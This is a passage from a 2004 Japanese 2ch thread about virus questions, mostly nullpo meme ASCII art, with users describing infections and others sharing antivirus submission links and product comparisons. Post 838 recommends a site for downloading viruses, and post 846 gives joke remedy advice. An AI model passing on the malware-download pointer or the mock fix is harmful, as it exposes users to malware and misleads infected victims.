   ;'`;、、:、. .:、:, :,.: ::`゙:.:゙:`''':,'.´ -‐i
   '、;: ...: ,:. :.、.∩.. .:: _;.;;.∩‐'゙  ̄  ̄
    `"゙' ''`゙ //゙`´´   | |
        //Λ_Λ  | |
        | |( ´Д`)// <>>823 こんにゃろー!エビフライぶつけんぞ
        \      |


834 :NullPointerException:04/04/13 04:59
NullPointerException
NullPointerException
NullPointerException
NullPointerException










835 :名無しさん@お腹いっぱい。:04/04/13 05:07
( ´∀`)ノ (*´∀`*)ムフーッ

836 :NullPointerException:04/04/13 08:17
NullPointerException=ぬるぽ(・∀・)イイ!!

837 :誘導:04/04/13 08:23
【正式】ウィルス情報&質問 総合スレッド☆Part18
http://pc3.2ch.net/test/read.cgi/sec/1081735712/l50

838 :名無しさん@お腹いっぱい。:04/04/13 10:48
http://easyweb.easynet.co.uk/~hiros/Virus.htm
1、はいったらまず表示
2、エンコードから日本語(自動選択)
ここいいよ。いろんなウィルスがダウンロードできる。

839 :名無しさん@お腹いっぱい。:04/04/13 11:24
.          ミ _ ガッ
   (   ,,)┌―─┴┴─―┐
  /   つ.    ガッ   人
〜′ /´ └―─┬┬─ <  >__Λ∩
 ∪ ∪        ││   .V`Д´)/
           ゛゛'゛'゛       / ←>>827

  -=≡ ( ・∀・)
    -=( つ┯つ
   -=≡/  / //∧    ガッ
  -=≡(__)/ )< >__∧∩
   -= (◎) ̄)) ∨`Д´)/ ←>>834
               /

  ( ・∀・)   | | ガッ
 と    )    | |
   Y /ノ     人 _____,_
    / )    <  >_∧∩:::::::::/ チャラッチャラッチャーンミヨヨヨーン…
  _/し' //:::V`Д´) /:::::::/
 (_フ彡  /::::::(     ./:::::::/ ←>>836

840 :名無しさん@お腹いっぱい。:04/04/13 18:54
なんかtempフォルダにWinWildApp.exeとかいうプログラムがあるんだけど。
これってウイルス?

841 :名無しさん@お腹いっぱい。:04/04/13 21:32
>817さん
俺と同じですね…
駆除、削除、隔離が出来ませぬ。
どなたか助けてください…

842 :名無しさん@お腹いっぱい。:04/04/13 21:47
【正式】ウィルス情報&質問 総合スレッド☆Part18
http://pc3.2ch.net/test/read.cgi/sec/1081735712/l50

843 :名無しさん@お腹いっぱい。:04/04/14 00:33
>>841
セーフモードで手動でも削除できないのか?

844 :名無しさん@お腹いっぱい。:04/04/14 06:54
>>841
タスクマネージャでいくつかのプロセスを終了させると削除できる。
削除に成功すると次があるわけだが。



845 :虎鉄 ◆k.A...R.C. :04/04/14 19:52
W32.Klezに感染して削除しようとするとfyzpk.exeが見つからないとでるのですがfyzpk.exeてなにですか?

846 :名無しさん@お腹いっぱい。:04/04/15 00:25
>>845
このスレにぬるぽって書き込むとなおりますよ。

847 :名無しさん@お腹いっぱい。:04/04/15 03:17
               ☆*::.。
               /  ゚+ 。
.              /    . +
        ( ・∀・))      ゜
        と    /       ゚*し/    ガッ
         ヽ (⌒)      。:  て_∧∩
          .(__)     +゜  _( `Д´)/ >>846
                   ⌒丶..    /

848 :ぬるぽ:04/04/15 08:59
ぬるぽって言う人って同一人物?
叩く人も同一人物?

849 :名無しさん@お腹いっぱい。:04/04/15 18:37
            /  _| ̄|__  □□\
         _    . .|_   _. .:|\\\\|
     (n・∀・)n     \|  |\|  |  |  ̄ ̄
    ( '   r'´  \    |_|  |_|  |     □□\| ̄|\
    | | |         \.:\|\.\|     \\゙/./\|    ガッ
    (___)._)           ̄    ̄       | ̄_./  ./し _∧∩
                               \_.\/   て`Д´)/ >>848
                                           /

850 :名無しさん@お腹いっぱい。:04/04/15 23:02
ウイルスに感染しました。
ノートンで削除できたようですが、削除後に白い画面が急に表示されたり
デスクトップショートカットの、左下の矢印が表示されなくなりました。
どのような事が考えられるでしょうか?

851 :名無しさん@お腹いっぱい。:04/04/16 23:41
●新種・亜種ウイルスを発見した場合のサンプル提出方法

ノートン http://service1.symantec.com/SUPPORT/INTER/entsecurityjapanesekb.nsf/jp_docid/20020624043939949
ウイルスバスター http://inet.trendmicro.co.jp/esolution/supform.asp
マカフィー http://www.nai.com/japan/security/contactavert.asp
ウイルスセキュリティ https://www.sourcenext.com/qa/action/qagoodslist
NOD32アンチウイルス http://canon-sol.jp/supp/n_email.html
V3ウイルスブロック http://www.ahnlab.co.jp/customer/index.asp
ウイルスドクター http://www.virusdoctor.jp/virus/
ウイルスプロテクター http://www.lifeboat.jp/support/support.html
ウイルスチェイサー http://www.viruschaser.jp/support_vc.html
ソフォス http://www.sophos.co.jp/support/queries/#sample
F-Secure http://www.f-secure.co.jp/support/
       http://support.f-secure.com/enu/home/virusproblem/sample/

BitDefender http://www.bitdefender.com/bd/site/contactus.php
AntiVir http://www.free-av.com/ からSupportをクリック
avast! http://www.avast.com/i_idt_144.html
eTrust http://www.caj.co.jp/support/csp/free_policy/virus.htm
AVG http://www.grisoft.com/us/us_ts_mail.php

852 :ぬるぽ人:04/04/17 15:44
http://www.NullPointerException/NullPo

853 :名無しさん@お腹いっぱい。:04/04/17 17:18
ぬるぽって何?(´,_ゝ`)

854 :名無しさん@お腹いっぱい。:04/04/17 21:04
   ()二フ 
     \
  丶._从 \ 
  )      (( ・∀・ ) 
   ∧_∧  ヽ  と )
  ((`Д´∧_∧
   ヽ ((`Д´∩  >>852-853
  ガッ    ガッ

855 :名無しさん@お腹いっぱい。:04/04/18 03:55
syncagent.exe
aupdater.exe

この2つのファイルがネットにアクセスしようとします。
ウィルスチェック(AVG)しても何もないし、スパイウェア検索(Spybot)しても何もないし。
上のファイルはぐぐったらでてきて、KeyLoggerらしいのです。
下のファイルはぐぐってもロシア語しか出てこなくて、謎です。

あぁぁぁあ、もちろんアクセスは禁止してるんですが、正しい対処法を伝授してくだせぇ。

856 :名無しさん@お腹いっぱい。:04/04/18 06:46
>>854
そんなにぬるぽ叩くAAあったっけ?

857 :名無しさん@お腹いっぱい。:04/04/19 08:46
  ( ・∀・)            人 ガッ
  (    つ―-‐-‐-‐-‐-‐○ <  >__Λ∩
  人 Y ノ            . . V`Д´)/
  し(_)            .      /  ←>>856

858 :名無しさん@お腹いっぱい。:04/04/19 11:08
>>857
ぬるぽ^^

859 :名無しさん@お腹いっぱい。:04/04/20 09:12
ぬるぽいんたーえくすぷしょん

860 :名無しさん@お腹いっぱい。:04/04/20 17:10
ぬ、ぬるぽ!?

861 :名無しさん@お腹いっぱい。:04/04/20 18:10
  ( ・∀・)      | |       
 と    )      | |    人   ガガガガッ
   Y /ノ       .人   <  >_∧∩
    / ) .人   <  >_∧∩`Д´)/
  _/し' <  >_∧∩`Д´)/   / ←>>858
 (_フ彡 V`Д´)/   / ←>>859
            / ←>>860

862 :名無しさん@お腹いっぱい。:04/04/20 18:21
お〜い!ぬるぽ〜!!








ぬ〜るぽぉぉぉ〜!

863 :名無しさん@お腹いっぱい。:04/04/20 18:26
ホームページとして使用するアドレスが勝手に設定された。
で、何度変更しても再起動したときには同じサイトが・・気持ち悪い。。
これって何?

864 :名無しさん@お腹いっぱい。:04/04/20 18:37
さぁねぇ(・∀・)ニヤニヤ

865 :名無しさん@お腹いっぱい。:04/04/20 19:38
>863
http://pc5.2ch.net/test/read.cgi/pcqa/1082454987/6

866 :名無しさん@お腹いっぱい。:04/04/20 21:47
        ┏┳━━┓
    ┏━┛┃━┏┃
┏━┻┳━┫  ┛┣━┓           ┃ ・・
┃自  ┃  ┗━━┛  ┃i |l |l i|l |l |l i ┣┿ . . ┃ ・・
┃動  ┣┯┯┯┯┯┯┫| || || ||| || |l l ┃├─ ┣┿ . . ┃ ・・
┃叩  ┠|/~""''" "''" ┏━━━┳┓ll l   │   ┃├─ ┣┿ . . ┃ ・・
┃き g╂| ヽ||  || ,ノ┃  ┏━┻┻━┓         │   ┃├─ ┣┿ . .
┃機  ┠|  ||ミ /~~゙ r┫  ┣━┻━  ┃                │   ┃├─  .
┃一  ┠|--'j|| | (=|_   ╋━┻━  ┃                 │ 
┃時  ┠|、_ノ|| | ┏━━━┳┓┻━  ┃
┃間  ┠|`ミ || '┃┻━┳┻┻┓━━┛
┃二  ┠| /~~,.r┫    ┃  ━┫.' '⌒)  ガッガッ
┃百  ┠| || (=|_       ┃  ━┫ _'∧∩
┃円  ┠| || (=|_       ┃  ━┫ `Д´)/ ← >>862
┗━━┻' `ー~ `┻━━┻━━┛    /

867 :名無しさん@お腹いっぱい。:04/04/20 22:51
(・∀・)イイ!!ぬ(ry

868 :名無しさん@お腹いっぱい。:04/04/22 07:13
        クルクル
          _ /lミ
        l /| ̄ l
  ( ・∀・) | |. |   |ガッ∧∩
    ⊂彡☆|_| .|__|))Д´)/  >>867
        .::|/彡    /

869 :名無しさん@お腹いっぱい。:04/04/22 09:56
  これでどうだぁ〜!!

       ぬるぽぬるぽぬるぽぬるぽぬるぽぬるぽ
        ぬるぽぬるぽぬるぽぬるぽぬるぽぬるぽ
  ∧__∧  ぬるぽぬるぽぬるぽぬるぽぬるぽぬるぽ
  ( ´・ω・`) ぬるぽぬるぽぬるぽぬるぽぬるぽぬるぽ
  /ヽ○==○ ぬるぽぬるぽぬるぽぬるぽぬるぽぬるぽ
 /  ||_ | ぬるぽぬるぽぬるぽぬるぽぬるぽぬるぽ
 し' ̄(_)) ̄(_)) ̄(_)) ̄(_)) ̄(_)) ̄(_)) ̄(_)) ̄(_)) ̄(_))




870 :名無しさん@お腹いっぱい。:04/04/22 20:04
ぬろぽぬろぽぬろぽぬろぽぬろぽぬろぽ
ぬろぽぬろぽぬるぽぬろぽぬろぽぬろぽ
ぬろぽぬろぽぬろぽぬろぽぬろぽぬろぽ
ぬろぽぬろぽぬろぽぬろぽぬろぽぬろぽ
ぬろぽぬろぽぬろぽぬろぽぬろぽぬろぽ
ぬろぽぬろぽぬるぽぬろぽぬろぽぬろぽ


871 :名無しさん@お腹いっぱい。:04/04/22 23:56
/////////////////////////////////////////////////////////////////

System Safety Monitor(SSM)

・リアルタイムでシステムの活動をモニターし、常駐させればKerio4のように
 HTMLからのexe起動を含め、キンタマウイルス http://internet.watch.impress.co.jp/static/index/2004/04/09/antinny.htm
 などの(ルールが)未決定のアクションを防げる(PFWではない)

・無料
・日本語化できる
・レジストリキーの変更も監視できる

●SSMヘルプ翻訳テキスト+HTML配布サイト
http://www.geocities.co.jp/Outdoors-Mountain/9671/ssm/
http://www.geocities.co.jp/Outdoors-Mountain/9671/ssm/aarules.html

/////////////////////////////////////////////////////////////////

872 :名無しさん@お腹いっぱい。:04/04/23 00:19
tp://www.geocities.jp/rina1462cg/under-color/index2.htm

873 :名無しさん@お腹いっぱい。:04/04/23 06:48
( ・∀・)⊃─[]ガッ
[    ]  (´・ω・`) ←>>869


  ( ・∀・)             | | ガッ
 と    ) 彡          | |
   Y /ノ               人
   (  )                <  >__Λ∩
    し'         _//. V`Д´)/ ←>>870
            (_フ彡      /

874 :名無しさん@お腹いっぱい。:04/04/23 12:32
|
|⌒彡
|冫、)  / ̄ ̄ ̄ ̄ ̄
|` / <   ぬるぽ
| /    \_____
|/
|


|
|  サッ
|)彡
|
|
|


875 :名無しさん@お腹いっぱい。:04/04/24 06:42
   + ゜: ゜  ≦_ ̄_ ̄─
  _ ─    +  ≦_   )
≦_    )        ̄≡/
  ≦_ ≡\ ゝ ̄ヽ  /
   ゜+ :   \Γ 了/
            |.@|
          /|  .| \
    .    /  .|ヱ|   \ミ  ̄─ ≧_
       / ミ   .| .|    (   _ =≧
      (    ̄ ≧_      ̄人      ドガガガガガガッ
         ─_  _≧ ゜+ <  > Λ∩
            ̄      /.V`Д´)/ ←>>874

876 :名無しさん@お腹いっぱい。:04/04/24 08:52
windows系のプログラムが使えなくなりました。
これもぬるぽでしょうか。
もうダメポ

877 :名無しさん@お腹いっぱい。:04/04/24 11:41
       ドゾー
       ぬるぽぬるぽぬるぽぬるぽぬるぽぬるぽ
        ぬるぽぬるぽぬるぽぬるぽぬるぽぬるぽ
  ∧__∧  ぬるぽぬるぽぬるぽぬるぽぬるぽぬるぽ
  ( ´・ω・`) ぬるぽぬるぽぬるぽぬるぽぬるぽぬるぽ
  /ヽ○==○ ぬるぽぬるぽぬるぽぬるぽぬるぽぬるぽ
 /  ||_ | ぬるぽぬるぽぬるぽぬるぽぬるぽぬるぽ
 し' ̄(_)) ̄(_)) ̄(_)) ̄(_)) ̄(_)) ̄(_)) ̄(_)) ̄(_)) ̄(_))




878 :名無しさん@お腹いっぱい。:04/04/24 16:07
ぬろぽ

879 :名無しさん@お腹いっぱい。:04/04/24 18:04
ぬるぽ

880 :名無しさん@お腹いっぱい。:04/04/25 00:56
     ∧
    <  >_∧
= ()二)V`Д´) . ぬるぽ!
    \ヽ ノ )
    ノ(○´ノ  ガッ
   (_ノ(__)

881 :名無しさん@お腹いっぱい。:04/04/25 17:41
ネットを開くたびにhttp://freednshost.info/に飛ばされてしまうのですが
これはウイルスですか?お気に入りにもおぼえのないものがあって。。
どなたか対処法を教えてください!

882 :名無しさん@お腹いっぱい。:04/04/28 08:02
ぬる木゜

883 :名無しさん@お腹いっぱい。:04/04/28 08:24
msiwin84.exe ってのが裏で動いてるみたいなんですが
タスクマネジャから終了させてもしばらく経つと勝手に起動する。

症状はCドライブにランダムな文字列の.exeファイル作ってくのと
トレンドマイクロとかにアクセス出来なくなるぽ。

調べても情報出てこなかったんですけど、新種ですか?

884 :883:04/04/28 10:09
しかもアンチウイルスソフト起動できなくなるぽい
なんか送信してるし

885 :名無しさん@お腹いっぱい。:04/04/28 12:00
>>883
【正式】ウィルス情報&質問 総合スレッド☆Part18
http://pc3.2ch.net/test/read.cgi/sec/1081735712/l50

886 :名無しさん@お腹いっぱい。:04/04/29 02:53
PC起動後、10分程度経つと、
ファイル、フォルダ、あらゆるものにアクセスできなくなり、
スタートメニューを出しても空白で何も表示されず。
Norton AntiVirusでスキャンしてもウイルス無し。
もう、PCが10分しか使えず、大変困っております。
どなたか助言をお願いいただけませんでしょうか。

887 :名無しさん@お腹いっぱい。:04/04/29 09:09
CPU のファンがとまっている。とかでは?

888 :883:04/05/01 16:53
>>885
誘導どうもです。

そっちに質問させていただきます。

889 :名無しさん@お腹いっぱい。:04/05/01 23:57
Norton Internet Security 2004
圧縮ファイルもリアルタイムで監視可能だが、ONにすると重すぎ
スクリプト遮断機能がある
広告ブロックがアメリカ仕様で、お絵かき掲示板などの画像も消してしまう
スレに貼り付けてあるだけのウイルスコードに反応する
2chの過去ログ取得する時はFWを無効にしないといけない
Antispamが勝手にメーラーと統合する上に不安定(OEと相性が悪い?)
ポップアップ通知が鬱陶しい
LiveUpdateが遅い
webごとにスプリクト遮断やActiveX遮断やプライバシー制御の設定ができる
WEB閲覧するときHTMLファイルにスクリプトを埋め込む処理が重い
 (XPSP2ではデフォルトでポップアップ広告遮断機能があるので無駄になる)
回線速度が遅くなるという報告
ルールが適切ではないとの声もあるがPFWルールの自動作成が進んでいる
不正コピー・不正期限延長ユーザーが多い
個人情報を送ってるかについては疑惑は晴れず。
http://www.symantec.com/region/jp/products/nis/features.html
http://www.symantec.com/region/jp/products/nav/features.html

ウイルスバスター2004
圧縮ファイルもリアルタイムで監視可能だが、ONにすると重すぎ
FWレベル高にしないとアプリごとの制御ができない等、おまけ程度
スパイウェアの検出をするが削除は出来ない
迷惑メール検出の判定精度が悪い上に検出しても件名に[MEIWAKU]と付けるだけで意味がない
ユーザー登録しないとウィルス定義をUPできないので不正コピーユーザーは少ない
http://www.trendmicro.com/jp/products/desktop/vb/evaluate/features.htm

FWがしょぼい代わりに不具合が少ないバスターとFWにいろいろと機能が付いてる
代わりに不具合大盛りなNISって感じかな。
どちらもアンチウイルス機能自体には文句が出ないのは例年通り。

http://pc3.2ch.net/test/read.cgi/sec/1067918099/321

230 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)